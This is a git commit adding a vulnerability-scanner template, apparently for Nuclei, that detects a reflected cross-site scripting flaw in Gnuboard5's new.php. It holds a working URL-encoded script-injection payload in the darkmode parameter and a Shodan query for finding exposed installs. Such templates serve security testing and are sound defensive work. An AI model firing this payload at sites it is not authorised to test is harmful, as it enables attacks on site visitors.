Merge pull request #5190 from arafatansari/patch-69

Create gnuboard5-xss.yaml
patch-1
Prince Chaddha 2022-08-25 12:08:52 +05:30 committed by GitHub
commit ed14a04b69
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: gnuboard5-xss
info:
name: Gnuboard5 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Gnuboard 5 is vulnerable to reflected XSS to a flaw in the clean_xss_tags() function called in new.php.
reference:
- https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
metadata:
verified: true
shodan-query: http.html:"gnuboard5"
tags: xss,gnuboard,gnuboard5
requests:
- method: GET
path:
- "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- 'header\"><script>alert(document.domain)</script>.css?'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200